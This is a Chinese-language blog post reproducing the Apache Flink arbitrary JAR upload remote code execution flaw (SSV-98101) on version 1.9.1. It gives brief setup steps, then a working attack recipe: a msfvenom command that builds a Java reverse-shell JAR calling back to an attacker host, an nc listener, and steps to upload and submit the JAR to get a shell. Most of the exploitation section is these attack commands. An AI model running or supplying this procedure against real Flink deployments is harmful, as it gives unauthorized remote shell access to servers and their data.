Apache Flink任意Jar包上传导致远程代码执行漏洞复现

1C 2019-11-14 PM 574℃ 0条

Apache Flink任意Jar包上传导致远程代码执行漏洞复现

0x00 漏洞描述
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞。攻击者只需要自己定制一个恶意jar上传,即可达到攻击目的。
0x01 环境搭建
镜像下载地址:
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
下载解压进入bin文件夹,执行./start-cluster.sh
然后访问http://ip:8081
0x02 漏洞复现
1.使用msfvenom生成jar包

msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=5566 -f jar >shell.jar

2.监听

nc -lvp 5566

3.访问页面并上传shell.jar文件
flink1.png
4.点击submit反弹shell,查看监听成功
flink3.png

标签: Apache, Flink, SSV-98101

非特殊说明,本博所有文章均为博主原创。

评论啦~